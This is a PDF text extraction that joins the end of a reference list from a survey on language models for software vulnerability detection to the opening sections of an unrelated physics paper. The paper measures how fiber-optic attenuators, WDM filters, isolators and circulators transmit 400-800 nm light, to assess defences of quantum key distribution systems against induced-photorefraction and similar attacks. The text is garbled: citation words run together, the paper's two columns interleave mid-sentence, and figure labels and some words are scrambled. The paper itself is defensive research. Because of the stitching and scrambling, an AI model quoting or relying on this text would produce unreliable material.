Shestov,A.,Cheshkov,A.,Levichev,R.,Mussabayev,R.,Zadorozhny,P.,Maslov,E.,Vadim,C.,andBulychev, E.Finetuninglargelanguagemodelsforvulnerabilitydetection.CoRRabs/2401.17010(2024). [88] Steenhoek,B.,Rahman,M.M.,Jiles,R.,andLe,W.Anempiricalstudyofdeeplearningmodelsforvulnerability detection.In2023IEEE/ACM45thInternationalConferenceonSoftwareEngineering(ICSE)(2023),IEEE,pp.2237–2248. [89] Steenhoek,B.,Rahman,M.M.,Jiles,R.,andLe,W.Anempiricalstudyofdeeplearningmodelsforvulnerability detection.In45thIEEE/ACMInternationalConferenceonSoftwareEngineering,ICSE2023,Melbourne,Australia,May 14-20,2023(2023),IEEE,pp.2237–2248. [90] Steenhoek,B.,Rahman,M.M.,Sharmin,S.,andLe,W.Dolanguagemodelslearnsemanticsofcode?Acasestudy invulnerabilitydetection.arXivpreprintarXiv:2311.04109(2023). [91] Tabassum,J.,Maddela,M.,Xu,W.,andRitter,A. Codeandnamedentityrecognitioninstackoverflow. In Proceedingsofthe58thAnnualMeetingoftheAssociationforComputationalLinguistics(ACL)(2020). [92] Tang,W.,Tang,M.,Ban,M.,Zhao,Z.,andFeng,M.CSGVD:Adeeplearningapproachcombiningsequenceand graphembeddingforsourcecodevulnerabilitydetection.J.Syst.Softw.199(2023),111623. [93] TARGETT,E.Weanalysed90,000+softwarevulnerabilities:Here’swhatwelearned.https://www.thestack.technology/ analysis-of-cves-in-2022-software-vulnerabilities-cwes-most-dangerous/,2022. [94] Thapa,C.,Jang,S.I.,Ahmed,M.E.,Camtepe,S.,Pieprzyk,J.,andNepal,S.Transformer-basedlanguagemodels forsoftwarevulnerabilitydetection.InAnnualComputerSecurityApplicationsConference,ACSAC2022,Austin,TX, USA,December5-9,2022(2022),ACM,pp.481–496. [95] Tran,H.-C.,Tran,A.-D.,andLe,K.-H.Detectvul:Astatement-levelcodevulnerabilitydetectionforpython.Future GenerationComputerSystems(2024),107504. [96] Trivedi,H.,Balasubramanian,N.,Khot,T.,andSabharwal,A. Interleavingretrievalwithchain-of-thought reasoningforknowledge-intensivemulti-stepquestions.arXivpreprintarXiv:2212.10509(2022). [97] Vaswani,A.,Shazeer,N.,Parmar,N.,Uszkoreit,J.,Jones,L.,Gomez,A.N.,Kaiser,Ł.,andPolosukhin,I.Attention isallyouneed.Advancesinneuralinformationprocessingsystems30(2017). [98] Vicarius.vuln_gptdebutsasai-poweredapproachtofindandremediatesoftwarevulnerabilities.https://venturebeat. com/ai/got-vulns-vuln_gpt-debuts-as-ai-powered-approach-to-find-and-remediate-software-vulnerabilities/,2023. [99] Wang,H.,Tang,Z.,Tan,S.H.,Wang,J.,Liu,Y.,Fang,H.,Xia,C.,andWang,Z.Combiningstructuredstaticcode informationanddynamicsymbolictracesforsoftwarevulnerabilityprediction.InProceedingsofthe46thInternational ConferenceonSoftwareEngineering(2024),ACM. [100] Wang,J.,Huang,Y.,Chen,C.,Liu,Z.,Wang,S.,andWang,Q.Softwaretestingwithlargelanguagemodel:Survey, landscape,andvision.arXivpreprintarXiv:2307.07221(2023). [101] Wang,L.,Ma,C.,Feng,X.,Zhang,Z.,Yang,H.,Zhang,J.,Chen,Z.,Tang,J.,Chen,X.,Lin,Y.,etal.Asurveyon largelanguagemodelbasedautonomousagents.FrontiersofComputerScience18,6(2024),1–26. [102] Wang,R.,Li,Z.,Wang,C.,Xiao,Y.,andGao,C.Navrepair:Node-typeawareC/C++codevulnerabilityrepair.CoRR abs/2405.04994(2024).
[103] Wang,Y.,Wang,W.,Joty,S.,andHoi,S.C.Codet5:Identifier-awareunifiedpre-trainedencoder-decodermodels forcodeunderstandingandgeneration.arXivpreprintarXiv:2109.00859(2021). [104] Wei,Y.,Bo,L.,Wu,X.,Li,Y.,Ye,Z.,Sun,X.,andLi,B.Vulrep:vulnerabilityrepairbasedoninducingcommitsand fixingcommits.EURASIPJournalonWirelessCommunicationsandNetworking2023,1(2023),34. [105] Wen,X.,Wang,X.,Chen,Y.,Hu,R.,Lo,D.,andGao,C.Vuleval:Towardsrepository-levelevaluationofsoftware vulnerabilitydetection.CoRRabs/2404.15596(2024). [106] Wen,X.,Wang,X.,Gao,C.,Wang,S.,Liu,Y.,andGu,Z. Whenlessisenough:Positiveandunlabeledlearning modelforvulnerabilitydetection.In38thIEEE/ACMInternationalConferenceonAutomatedSoftwareEngineering, ASE2023,Luxembourg,September11-15,2023(2023),IEEE,pp.345–357. [107] Weng,C.,Qin,Y.,Lin,B.,Liu,P.,andChen,L. Matsvd:Boostingstatement-levelvulnerabilitydetectionvia dependency-basedattention.InProceedingsofthe15thAsia-PacificSymposiumonInternetware,Internetware2024, ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 29 Macau,SAR,China,July24-26,2024(2024),H.Mei,J.Lv,A.Helal,X.Ma,S.Cheung,J.Zhang,andT.Zhang,Eds., ACM. [108] Wohlin,C.Guidelinesforsnowballinginsystematicliteraturestudiesandareplicationinsoftwareengineering.In Proceedingsofthe18thInternationalConferenceonEvaluationandAssessmentinSoftwareEngineering(EASE)(2014), ACM,pp.38:1–38:10. [109] Wu,B.,Zou,F.,etal.Codevulnerabilitydetectionbasedondeepsequenceandgraphmodels:Asurvey.Security andCommunicationNetworks2022(2022). [110] Wu,Y.,Jiang,N.,Pham,H.V.,Lutellier,T.,Davis,J.,Tan,L.,Babkin,P.,andShah,S.Howeffectiveareneural networksforfixingsecurityvulnerabilities.InProceedingsofthe32ndACMSIGSOFTInternationalSymposiumon SoftwareTestingandAnalysis,ISSTA2023,Seattle,WA,USA,July17-21,2023(2023),R.JustandG.Fraser,Eds.,ACM, pp.1282–1294. [111] Xu,F.F.,Alon,U.,Neubig,G.,andHellendoorn,V.J.Asystematicevaluationoflargelanguagemodelsofcode.In MAPS@PLDI2022:6thACMSIGPLANInternationalSymposiumonMachineProgramming,SanDiego,CA,USA,13 June2022(2022),S.ChaudhuriandC.Sutton,Eds.,ACM,pp.1–10. [112] Yamaguchi,F.Joern:Asourcecodeanalysistool.https://github.com/octopus-platform/joern,2023. [113] Yang,A.Z.,Tian,H.,Ye,H.,Martins,R.,andGoues,C.L. Securityvulnerabilitydetectionwithmultitask self-instructedfine-tuningoflargelanguagemodels.arXivpreprintarXiv:2406.05892(2024). [114] Yang,J.,Jin,H.,Tang,R.,Han,X.,Feng,Q.,Jiang,H.,Zhong,S.,Yin,B.,andHu,X.B.Harnessingthepowerof llmsinpractice:Asurveyonchatgptandbeyond.ACMTrans.Knowl.Discov.Data18,6(2024),160:1–160:32. [115] Yang,X.,Wang,S.,Li,Y.,andWang,S.Doesdatasamplingimprovedeeplearning-basedvulnerabilitydetection? yeas!andnays!In45thIEEE/ACMInternationalConferenceonSoftwareEngineering,ICSE2023,Melbourne,Australia, May14-20,2023(2023),IEEE,pp.2287–2298. [116] Yang,Z.,Shi,J.,He,J.,andLo,D.Naturalattackforpre-trainedmodelsofcode.InProceedingsofthe44thInternational ConferenceonSoftwareEngineering(2022). [117] Yin,X.Prosandcons!evaluatingchatgptonsoftwarevulnerability.CoRRabs/2404.03994(2024). [118] Zhang,B.,Liang,P.,Zhou,X.,Ahmad,A.,andWaseem,M.Practicesandchallengesofusinggithubcopilot:An empiricalstudy.InThe35thInternationalConferenceonSoftwareEngineeringandKnowledgeEngineering,SEKE2023, KSIRVirtualConferenceCenter,USA,July1-10,2023(2023),S.Chang,Ed.,KSIResearchInc.,pp.124–129. [119] Zhang,C.,Liu,H.,Zeng,J.,Yang,K.,Li,Y.,andLi,H. Prompt-enhancedsoftwarevulnerabilitydetectionusing chatgpt.arXivpreprintarXiv:2308.12697(2023). [120] Zhang,H.,Babar,M.A.,andTell,P.Identifyingrelevantstudiesinsoftwareengineering.Inf.Softw.Technol.53,6 (2011),625–637. [121] Zhang,J.,Liu,Z.,Hu,X.,Xia,X.,andLi,S.Vulnerabilitydetectionbylearningfromsyntax-basedexecutionpaths ofcode.IEEETrans.SoftwareEng.49,8(2023),4196–4212. [122] Zhang,Q.,Fang,C.,Ma,Y.,Sun,W.,andChen,Z.Asurveyoflearning-basedautomatedprogramrepair.ACM TransactionsonSoftwareEngineeringandMethodology33,2(2023),1–69. [123] Zhang,Q.,Fang,C.,Xie,Y.,Zhang,Y.,Yang,Y.,Sun,W.,Yu,S.,andChen,Z.Asurveyonlargelanguagemodels
forsoftwareengineering.arXivpreprintarXiv:2312.15223(2023). [124] Zhang,Q.,Fang,C.,Yu,B.,Sun,W.,Zhang,T.,andChen,Z. Pre-trainedmodel-basedautomatedsoftware vulnerabilityrepair:Howfararewe?IEEETransactionsonDependableandSecureComputing(2023). [125] Zhang,T.,Kishore,V.,Wu,F.,Weinberger,K.Q.,andArtzi,Y.Bertscore:EvaluatingtextgenerationwithBERT. In8thInternationalConferenceonLearningRepresentations,ICLR2020,AddisAbaba,Ethiopia,April26-30,2020(2020), OpenReview.net. [126] Zhang,Z.,Chen,C.,Liu,B.,Liao,C.,Gong,Z.,Yu,H.,Li,J.,andWang,R.Unifyingtheperspectivesofnlpand softwareengineering:Asurveyonlanguagemodelsforcode.arXivpreprintarXiv:2311.07989(2023). [127] Zhao,W.X.,Zhou,K.,Li,J.,Tang,T.,Wang,X.,Hou,Y.,Min,Y.,Zhang,B.,Zhang,J.,Dong,Z.,etal.Asurveyof largelanguagemodels.arXivpreprintarXiv:2303.18223(2023). [128] Zhou,X.,Kim,K.,Xu,B.,Han,D.,andLo,D. Outofsight,outofmind:Betterautomaticvulnerabilityrepairby broadeninginputrangesandsources.In2024IEEE/ACM46thInternationalConferenceonSoftwareEngineering(ICSE) (2024),IEEEComputerSociety,pp.872–872. [129] Zhou,X.,Kim,K.,Xu,B.,Liu,J.,Han,D.,andLo,D. Thedevilisinthetails:Howlong-tailedcodedistributions impactlargelanguagemodels.In202338thIEEE/ACMInternationalConferenceonAutomatedSoftwareEngineering (ASE)(2023),IEEE,pp.40–52. [130] Zhou,X.,Tran,D.-M.,Le-Cong,T.,Zhang,T.,Irsan,I.C.,Sumarlin,J.,Le,B.,andLo,D.Comparisonofstatic applicationsecuritytestingtoolsandlargelanguagemodelsforrepo-levelvulnerabilitydetection.arXivpreprint arXiv:2407.16235(2024). [131] Zhou,X.,Xu,B.,Han,D.,Yang,Z.,He,J.,andLo,D.Ccbert:Self-supervisedcodechangerepresentationlearning. ,Vol.1,No.1,Article.Publicationdate:October2024.30 Zhouetal. In2023IEEEInternationalConferenceonSoftwareMaintenanceandEvolution(ICSME)(2023),IEEE,pp.182–193. [132] Zhou,X.,Zhang,T.,andLo,D. Largelanguagemodelforvulnerabilitydetection:Emergingresultsandfuture directions.ICSENIERtrack(2024). [133] Zhou,Z.,Bo,L.,Wu,X.,Sun,X.,Zhang,T.,Li,B.,Zhang,J.,andCao,S.Spvf:securitypropertyassistedvulnerability fixingviaattention-basedmodels.EmpiricalSoftwareEngineering27,7(2022),171. [134] Ziems,N.,andWu,S.Securityvulnerabilitydetectionusingdeeplearningnaturallanguageprocessing.In2021IEEE ConferenceonComputerCommunicationsWorkshops,INFOCOMWorkshops2021,Vancouver,BC,Canada,May10-13, 2021(2021),IEEE,pp.1–6. ,Vol.1,No.1,Article.Publicationdate:October2024.
2404.03956 Vulnerabilities of quantum key distribution systems in visible range Boris Nasedkin,1,2,∗ Azat Ismagilov,1 Vladimir Chistiakov,2 Andrei Gaidash,1,3 Aleksandr Shimko,4 Alexei D. Kiselev,1 Anton Tcypkin,1 Vladimir Egorov,2 and Anton Kozubov1,3 1Laboratory of Quantum Processes and Measurements, ITMO University, 199034, 3b Kadetskaya Line, Saint Petersburg, Russia 2Laboratory for Quantum Communications, ITMO University, 199034, 3b Kadetskaya Line, Saint Petersburg, Russia 3Department of Mathematical Methods for Quantum Technologies, Steklov Mathematical Institute of Russian Academy of Sciences, 119991, 8 Gubkina St, Moscow, Russia 4Center for Optical and Laser materials research, Saint-Petersburg State University, 198504, 5 Ulianovskaya, Saint Petersburg, Russia (Dated: August 15, 2024) Spectralloopholesinthe1000-2100nmrangehavebeenthefocusofattentionofquantumhacking researchaimedatsearchingandeliminationofvulnerabilitiesinquantumkeydistributionsystems. In this work, we concentrate on shorter wavelengths ranged from 400 nm up to 800 nm and ex- perimentally study spectra of insertion losses for a number of fiber optical components to assess potentials for their implementation as countermeasures. We show that efficiency of the elements commonly used as countermeasures against hacking attacks in the telecom range can be signifi- cantly impaired in the visible range. It is found that the vulnerabilities detected in this range play an increasingly important role for hacking strategies such as the induced-photorefraction attack, whose efficiency improves when the wavelength decreases. We consider security issues emerged due to the latter effect and discuss possible countermeasures if any for various utilization cases of phase-modulators. I. INTRODUCTION A quintessential illustration of a passive attack is the Trojan-horse attack, which is also known as the large The security of quantum key distribution (QKD) sys- pulse attack [31, 32]. In this scenario, the eavesdropper tems hinges upon the fundamental laws of physics. Over (Eve) employs scanning pulses introduced into the sys- the past decades, significant progress has been made in tems of legitimate users (Alice and Bob) via the quan- theoretical security proofs [1–12]. However, many of tum channel, allowing for the extraction of distributed theseproofsrestontheassumptionofperfectandtrusted sequencesfromthereflectedportionsoftheeavesdropper devices. Such trust assumption imposes a rather strong pulses back into the quantum channel. The key factors security requirement, which is generally difficult to im- that determine the efficiency of this attack involve the plement in practice. In real situations, imperfect devices transmittance of elements in two directions, the distin- inQKDsystemswouldintroducevulnerabilitiesthatcan guishabilityofstatesalongwithcountermeasuresutilized beexploitedbyeavesdropperstoextractadditionalinfor- inthesystem. Animportantpointisthatallthesefactors mationaboutthetransmittedbitsduringtheirattacksas require the eavesdropper to define the optimal spectral it is considered in [11–16]. Device-independent (DI) [17– range of wavelengths employed to perform attack. 21] and semi-device-independent [22–25] protocols have The well-known detector blinding attack (DBA) [33– emerged as a prominent area of research that provides a 35]exemplifiesanactiveattack. Theideaunderlyingthe waytopreventside-channelattacks[26]. Ontheopposite attack is that, under the action of high-power laser radi- side, another rapidly developing field which is often re- ation (as compared to typical intensities used in QKD), ferredtoasquantumhackinghasreceivedaconsiderable the operating mode of single photon detectors (SPDs) amount of attention [27]. basedonavalanchephotodiodescanbechangedfromthe Emerging approaches in quantum hacking pose novel Geiger mode into the linear operating mode, so that the challenges for security analysis of QKD systems. Nu- eavesdropper can manipulate the clicks registered by the merousvulnerabilitieshavebeenidentifiedinpriorworks SPDs. The efficiency of this DBA based quantum hack- [28–30], underscoring the importance of enhancing secu- ingapproachcruciallydependsonthespectralsensitivity ritymeasures. Eavesdropperstrategiesinquantumhack- oftheavalanchephotodiode,thetransmittanceofoptical ing can broadly be classified under two basic types, ac- elements connecting the quantum channel with the sin- tive and passive, as well as combinations thereof. Active glephotonavalanchediode(SPAD),andthecountermea- strategiesinvolvethemanipulationofopticalparameters sures implemented into the QKD system. So, it turned withinthehardware,whereaspassivestrategiessolelyfa- out that, similar to the Trojan-horse attack, the spectral cilitate the acquisition of additional information. range is one of the factors that govern the success of the DBA attack. Previous studies [36–39] motivated by the THA, have ∗ banasedkin@itmo.ru mainlybeenfocusedontransmittanceoffiberopticalele- 4202 guA 41 ]hp-tnauq[ 2v65930.4042:viXra2 mentsutilizedinQKDsystemsatwavelengthsrangedbe- nally, in Sec. V, we discuss and summarize our results. tween1000nmand2100nm. Forthe600-1000nmrange, the experimental results were reported in Refs. [39, 40]. But, for the above discussed DBA and the laser dam- II. EXPERIMENTAL SETUP AND METHOD age attacks (LDA) that exploit temperature dependence
of the transmittance of fiber-optical elements [41–43], Figure 1 shows the optical scheme of our experimental shorter wavelengths may also be used. At shorter wave- setup used to measure the insertion losses of optical ele- lengths, low insertion losses of elements employed for ments in the visible range. In this scheme, a broadband countermeasures may lead to unnoticed and thus poten- plasma light source (XWS65, ISTEQ) indicated as the tially successful delivery of radiation injected by Eve to broadbandlightsource(BLS)isutilizedtoproducelight the elements under attack. with wavelengths ranged from 250 nm up to 2500 nm. New vulnerabilities at different wavelengthshave been Referring to Fig. 1, the radiation from this source is di- the subject of intense recent studies [44]. The induced- rected into a single-mode fiber (OF) passing through a photorefraction attack (IPA) [27, 45] represent attacks set of lenses (L), filters (F) and the objective (O) which that will do better in the visible spectral range [46]. In is positioned on a three-axis stage to meet coupling and addition,thisattackisclaimedtobeapplicableforhack- spectrumrequirements. Afterthefiber,thefocusedlight ing measurement device independent (MDI) QKD sys- propagates through either a fiber or a fiber with the op- tems [27]. tical elements under test and is measured by the spec- The main targets of the IPA are phase and amplitude trometer(USB4000-UV-VIS-ES,OceanOptics)withthe modulators based on photo-refractive crystals, where 1.5 nm resolution. variations in refractive index ortransmittance can bein- duced by light. The IPA strategy enables Eve to ma- nipulate the characteristics of quantum states, i.e. mean photonnumber,atthesender’ssideusinglaserradiation. The efficiency of these attacks improves as the radiation wavelength becomes shorter [46]. So, it is important to performspectralmeasurementsoffibercomponentsused in QKD systems at shorter wavelengths so as to identify and mitigate vulnerabilities exposed by the attack. In particular, the 400-800 nm spectral range has not been received a proper attention yet. In this paper, our goal is to fill the gap. Notethat,accordingtoRef.[46],successfulimplemen- tation of the IPA requires low intensities starting from Figure 1. Optical scheme for insertion losses measurements 3 nW. A comparison between these intensities and the inthevisiblerange. BLSisbroadbandlightsource,Lislens, maximal intensity permissible for insertion into a fiber F is set of filters, O is objective, OF is single mode optical without causing damage, which is typically around 9 W fiber, EUT is element under test, S is spectrometer (this value is applicable to quartz single mode fibers without power damage level doping commonly used in An important point is that the spectrometer is fiber communications and may vary among manufactur- equipped with its own multimode fiber with an SMA905 ers) leads to the conclusion that attenuation needed for connector. So,inordertoalignthesingle-modeandmul- passive defence against IPA for single pass through opti- timode fibers, we have used the FC-SMA905 connector. cal elements can roughly be estimated at about 100 dB. Duetovariationsinefficiencyofcouplingtothesingle- Thus, in order to assess the feasibility of the attack, it is mode fiber, losses due to absorption by the filters and necessarytomeasureandanalyzeinsertionlossesofindi- technical restrictions imposed by the spectrometer, the vidual optical elements on the side of Alice. To this end, measured spectrum of the broadband light source (BLS) westudytheinsertionlossesofdifferentopticalelements wasnarrowedtothe400-800nmrange. Insertionlossesof in the 400–800 nm spectral range, demonstrate the ex- theopticalelementundertestwerecalculatedasfollows: istence of potential vulnerabilities and suggest potential countermeasures. The paper is organized as follows. α (λ)=−10log (cid:2) P (λ)/(P (λ)T (λ))(cid:3) , (1) dB 10 mes ref f In Sec. II we describe our experimental technique em- ployed to measure spectra of insertion losses of optical where the powers P (λ) andP (λ) are measured at ref mes elements at wavelengths ranged from 400 nm to 800 nm. wavelength λ without and with the tested optical ele- The experimental data for insertion losses measured for ment, respectively; T (λ) is the transmission of the set f a variety of optical attenuators, wave-division multiplex- of filters. Note that, in our experiments, the neutral fil- ing (WDM) and isolating components are presented in ters were used to extend the dynamic range of measure- Sec. III. Security issues related to considered effect and ments. For each element, we have performed ten mea- proposed countermeasures are discussed in Sec. IV. Fi- surements and the experimental results were averaged3 (a) 40 (b) 60 es (dB) 30 E EM MV VO OA A0 5V V es (dB) 40 E EO OV VO OA A0 5V V oss 20 oss n l n l ertio 10 ertio 20 ns ns I I 0 0 400 500 600 700 800 400 500 600 700 800 l(nm) l(nm) (c) 40 (d) 40 20 dB 20 dB B) 20 dB B) 15 dB es (d 30 10 dB es (d 30 5 dB oss 20 oss 20 n l n l o o erti 10 erti 10 ns ns I I 0 0 400 500 600 700 800 400 500 600 700 800 l(nm) l(nm) Figure 2. Insertion losses measured in the 400-800 nm range for (a) electro-mechanical and (b) electro-optical variable optical attenuators(blueandredsolidlinesindicatethezero-voltagecurveandthecasewheretheappliedvoltageis5V,respectively);
(d) absorption based fixed attenuators (the curves for the first 20 dB FOA, second 20 dB FOA and 10 dB FOA are indicated by black, red, and blue solid lines, respectively); (c) scattering based fixed attenuators principles (the curves for 20 dB FOA, 15 dB FOA and 5 dB FOA are indicated by black, red, and blue solid lines, respectively). (details on the error estimation procedure can be found turer datasheets, at the wavelength λ = 1550 nm, the in Appendix B of Ref. [37]). In what follows, we con- minimal values of insertion losses without power (the centrate on the optical elements that are usually placed fieldfreeregimewithoutappliedvoltage)are0.77dBand onthesender’ssidebetweentheoutputofthephaseand 0.80 dB for EO VOA and EM VOA, respectively. When amplitude modulators and the entrance of the quantum the applied voltage is 5 V, the corresponding measured channel. values of insertion losses for EO VOA and EM VOA are 36.0 dB and 43.4 dB. Figures 2(a) and (b) present wavelength dependencies of insertion losses measured in the 400-800 nm range for III. EXPERIMENTAL RESULTS EM VOA and EO VOA at two values of applied voltage: 0 V and 5 V. A. Optical attenuators In the zero-voltage case, it turned out that the mea- suredinsertionlossesarehigherthanthevaluesreported In this section, we present the results for two variable in the datasheet. For EM VOA and EO VOA, the mini- opticalattenuators(VOAs)thatdifferinthemodeofop- mal losses 10.7 dB and 21.8 dB are reached at the wave- eration, along with six different fixed optical attenuators lengths 761 nm and 557 nm, respectively. (FOAs). Referring to Figs. 2(a) and (b), when the applied volt- In QKD systems, optical attenuators (OA) are typ- ageis5V(bluelines),thelossesareshowntovaryinthe ically employed to reduce the intensity of laser pulses rangebetween13.7dBand30dBforEMVOA,whereas, to the single photon level. Additionally, OAs are of for EO VOA, they are ranged from 23.7 dB to 50 dB. importance in reducing the probability of wavelength- Note that these maximum values of losses are approx- dependent attacks successful realization. Consequently, imate, as they correspond to the noise level of our ex- there is a requirement to avoid pronounced variations of perimental setup and depend on the number of neutral spectral insertion loss properties of OAs across a broad filters. wavelengths range. Insertionlossesmeasuredinrelationtothewavelength InQKDsystems,theinsertionlossesofVOAsaretyp- for six FOAs are shown in Figs. 2(c) and (d). For three ically adjusted by applying voltage. This implies that absorptionbasedFOAs(seeFigs.2(c)), accordingtothe duringthekeydistributionprocess,theattenuationvalue valuesreportedbythemanufacturers,theinsertionlosses can be tuned in the range between the maximum and ofoneFOAis10dB,whereasthelossesfortheothertwo minimum insertion losses. To address this variability, we FOAs are the same and equal to 20 dB. For the scatter- haveevaluatedthemaximalandminimalinsertionlosses ing based FOAs (see Figs. 2(d)), there are three differ- settingsforoneelectro-mechanical(EM)andoneelectro- ent reported values of losses at the operating wavelength optical (EO) model of VOA. According to the manufac- (λ=1550 nm): 5 dB, 15 dB and 20 dB. Our experimen-4 (a) l (nm) (c) )Bd( sessol noitresnI 80 (b) 60 40 20 1550-ref com-1550 0 com-ref 400 500 600 700 800 l (nm) (d) )Bd( sessol noitresnI 80 60 40 20 1550-ref com-1550 0 com-ref 400 500 600 700 800 l (nm) )Bd( sessol noitresnI 400 500 600 700 800 l (nm) )Bd( sessol noitresnI 80 80 60 60 40 40 20 1550-ref 20 1550-ref com-1550 com-1550 0 com-ref 0 com-ref 400 500 600 700 800 Figure 3. Insertion losses measured in the 400-800 nm range for (a) CWDM1; (b) CWDM2; (c) CWDM3 and (d) DWDM (black, blue, and red solid lines indicate insertion losses measured for light propagating along three different directions: from the ref-port to the 1550-port, from the com-port to the ref-port and from the com-port to the 1550-port, respectively) tal results are in good agreement with these values. strate,willpropagatetothecorrespondingportoftheop- TheinsertionlossesoftheabsorptionbasedFOAsmea- eratingwavelengthsgrid. Otherwavelengthsaredirected sured in the 400-800 nm range are shown in Fig. 2(c). It to the reflecting port (the ref-port). This port might be can be seen that, for each FOA, there are two transmit- connected with a watchdog detector that monitor Eve’s tance windows where the insertion losses are noticeably probing pulses. The latter assumes that the sensitivity lower than the value at the operating wavelength indi- range of the watchdog detector is broad enough to cover catedinthelegend. Thewindowrangedbetween400nm wavelengths of potential attacks. and 430 nm is located in the vicinity of local minima for In practice, there are a number of factors limiting the thetwo20dBattenuatorswithα dB ≈8.1andα dB ≈8.6 efficiency of the WDM-components. These include the at the wavelength 405 nm (for the 10 dB attenuator, the substrate transmittance as well as the number, ordering, corresponding value is α dB ≈ 2.7) Similarly, the other and the thicknesses of the thin films. Differences be- window in the 750-800 nm wavelengths range is close to tween the perfectly designed mode of operation and its thelocalminimaatλ≈780nmwiththeinsertionlosses practicalimplementationmayleadtosidechannelsavail-
estimated at α dB ≈3.4 and α dB ≈4.3 and α dB ≈0.9. able to the eavesdropper. In our previous study [37], the Figure 2(d) shows the wavelength dependencies of the WDM-components are found to have the transmittance insertion losses measured for the scattering based FOAs. windows outside the telecom range, in agreement with It is seen that, for the 20 dB attenuator, the insertion the theoretical calculations reported in [47]. losses insignificantly change with wavelength, varying Similar to Ref. [37], we consider both coarse WDM from 27 dB to 25 dB. A similar conclusion applies to the (CWDM) and dense WDM (DWDM) components. 15 dB (5 dB) attenuator, where variations are between Specifically, insertion losses in the 400-800 nm range are 15.6 dB (11.2 dB) and 13 dB (10.8 dB). measured for the four filters: three CWDM-components from the same manufacturer where two of them belong to the same production batch (CWDM1 and CWDM2) B. Wavelength-division multiplexing components and one DWDM-component. The results are shown in Fig. 3. In QKD systems, wavelength-division multiplexing Inadditiontothecom-portandtheref-port,theWDM (WDM) components can be used as countermeasures by components have the 1550-port corresponding to the op- suppressingradiationwithwavelengthsoutsidetherange erating wavelength λ=1550 nm. Referring to Figure 3, utilizedbythecommunicationchannelbetweenAliceand when the probing light propagates from the com-port to Bob. In the simplest case, the key elements of the in- the 1550-port, each WDM-component reveals the ranges ternal design of a fiber WDM component are thin films of wavelengths where the insertion losses are within the deposited on a substrate. Ideally, at the working wave- interval between 10 dB and 20 dB. Minimal values of length, light will enter the common port (the com-port) insertion losses are presented in Table I. Note that, for and, after passing through the thin films and the sub- theWDM-componentsunderconsideration, thelossesin5 l (nm) )Bd( sessol noitresnI 80 60 40 20 0 400 500 600 700 800 )Bd( sessol noitresnI (a) (b) 60 40 20 4-2 0 3-1 400 500 600 700 800 l (nm) Figure 4. Insertion losses measured for (a) the dual stage isolator with light propagating from the output port to the input port; (b) the circulator (blue (red) solid lines represent insertion losses measured for light propagating from the third (fourth) port to the first (second) port). the telecom range at non-working wavelengths are about that can be detected in our experimental scheme (the 30 dB. dynamicrangeofourmeasurementsisabout50dB).But, inthe772-800nmrangewiththeminimallosses44.5dB Component α (dB) λ (nm) min min reached at λ=784 nm, the insertion losses appear to be CWDM1 10.0 680 lower than the above value at the operating wavelength. CWDM2 10.7 679 Similartoisolators,incirculators,lossesforlightprop- CWDM3 9.7 662 agating from one port to another (forward direction) are DWDM 10.3 665 low, whereas the light is nearly blocked when the direc- Table I. Minimal insertion losses and corresponding wave- tion of propagation is reversed (backward propagation). lengths for WDM components. In contrast to the isolators, the circulators have several ports (in our case, the circulator has four ports) that opens up additional possibilities for applications in more FromFig.3,itcanbeseenthat,forthelightpropagat- complicated schemes. For a number of different reasons, ingfromthecom-porttotheref-port,theinsertionlosses in real devices, the insertion losses for light propagating vary between 10 dB and 30 dB which is close to the val- in the backward direction will generally be wavelength ues for the above discussed direction from the com-port dependent and may deviate from the value reported by to the 1550-port. For the case of light propagation from manufacturers. the1550-porttotheref-port,itturnedoutthatthelosses According to the datasheet for the circulator, at λ = are close to the noise level. Note that, when directions 1550 nm, the insertion loss for backward direction is of light propagation are reversed, changes in insertion about 50 dB. lossesappeartobewellbelowaccuracyofmeasurements (theresultsofthesemeasurementsareomitted)andthus Insertion losses spectra measured for the cases where nonreciprocity effects have not been observed in our ex- light propagates from the third (fourth) port to the first periments. (second) bypassing the second (third) port are presented in Fig. 4(b). It can be seen that in the 400-506 nm range the losses are lower than the reported value at the C. Isolating components working wavelength. Minimal value of insertion losses is 31.1 dB at 419 nm. Owing to limitations of our experimental setup, we Isolating elements are typically utilized to reduce re- havenotdetectedanynoticeabletransmissionoflightfor flectionsbackintolaserresonators. SimilartotheWDM backward propagation between adjacent (neighbouring) components, in QKD systems, these elements may serve ports (for instance, propagation from the second port to as countermeasures against attacks. the first port). In this case, the results are well below In this section, we examine two elements: the dual the noise level and bear close resemblance to the curves stage isolator and the circulator. Since we are mainly measured for the isolator. interested in countermeasures against the IPA attack, the case of backward propagation of injected light where probing pulses travel from the output port to the input port will be our primary concern. IV. SECURITY ISSUES AND For the isolator, the spectrum of insertion losses is COUNTERMEASURES shown in Fig. 4(a). At the working (operating) wave-
length (1550 nm), the measured insertion losses for light It is evident that thevisiblespectrum does not permit propagating in backward direction is about 65 dB. the extraction of any additional information regarding From the curve depicted in Fig. 4(a), the values of signal states. Consequently, the visible spectrum can be measuredinsertionlossesaremostlybelowthenoiselevel consideredasanauxiliarycomponentofattacksaimedat6 (a) l (nm) (c) )mBd( rewoP 0 0 -50 -100 -100 -200 -150 -300 400 500 600 700 800 )mBd( rewoP (b) min max min max 400 500 600 700 800 l (nm) (d) min max 400 500 600 700 800 400 500 600 700 800 l (nm) l (nm) )mBd( rewoP )mBd( rewoP 0 0 -20 -100 -40 -60 -200 [24] -80 [30] [48] -100 -300 Figure 5. Estimated power that reaches the nearest investigated modulator in a system: (a) is for the scheme from [24], (b) is for the scheme from [30], (c) is for the scheme from [48]; where blue (red) solid lines represents minimal (maximal) power availabletoaneavesdropper. Frame(d)demonstratestheworstcaseofallinvestigatedschemes(a)-(c),wherebluesolidline representsevaluatedpowerfor[30],red–for[24]andgreen–for[48],blackdashedlinerepresentsconservativemeanofpower needed for IPA realization: yellow, red and green triangles corresponding to estimations from [46], [45] and [27] respectively altering specific characteristics of optical elements. This phase-remapping attack should be taken into con- includeslaserdamageattacks,laserseeding,andinduced sideration [53]. A number of papers are dedicated photorefraction attacks, among others. In the current to investigate the problemfor these kindsof proto- paper, we focus our attention on the IPA attack. We cols [27, 45, 46], also see Fig. 5; analyze various QKD schemes and protocols from open sources and investigate the potential vulnerabilities that 2. Protocols with linearly independent set of states may be exploited due to this type of attack. Crucial ele- (coherentstateswithphase-coding[54–57]orSCW ments influenced by IPA include various types of modu- QKD have not been considered so far in the light lators, both phase and intensity modulators. In the fol- of IPA auxiliary attack. Further, we draw special lowing section, we consider different scenarios and their attention to these 